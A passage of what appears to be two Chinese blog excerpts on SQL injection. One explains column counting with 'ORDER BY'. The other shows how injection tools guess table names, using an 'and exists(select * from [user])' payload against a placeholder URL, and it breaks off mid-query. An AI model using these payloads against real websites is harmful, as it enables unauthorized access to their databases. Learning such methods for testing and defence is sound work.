刚刚看完51cto的视频,实验发现思路不错但是不完美.首先看看下面的语句,意思是从tp_goods表筛选数据按照表中第一个字段排序SELECT * from tp_goods ORDER BY 1再首先看看下面的语句,意思是从tp_goods表筛选数据按照筛选的字段的第一个字段排序SELECT id,title from tp_goods 
前面已经讲了关于是否存在注入点的说明.现在讲下关于阿D注入和明小子检测存在注入猜表猜字段的原理.(使用工具一定要知道工具原理,方便后期自己完善/开发工具)1.猜表的方法:http://xxx.com/ProductShow.asp?articleid=143 and exists(select * from [user]) //查询是否存在user表http://xxx.com/ProductShow.asp?articleid=143 and exists(selec